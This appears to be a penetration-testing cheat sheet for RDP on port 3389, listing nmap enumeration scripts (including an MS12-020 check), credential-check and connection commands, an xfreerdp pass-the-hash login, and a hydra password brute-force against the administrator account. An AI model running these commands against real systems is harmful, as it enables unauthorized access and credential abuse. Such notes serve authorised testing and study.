Port 3389 - RDP

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 $IP

rdp_check $domain/$user:$pass@$IP

Connect

rdesktop $IP

xfreerdp /u:$domain\$user /p:$pass /v:$IP +clipboard

xfreerdp /u:$domain\$user /pth:$ntlmhash /v:$IP +clipboard

Brute (Probably Don't do this…)

hydra -t 1 -V -f -l administrator -P rockyou.txt rdp://$IP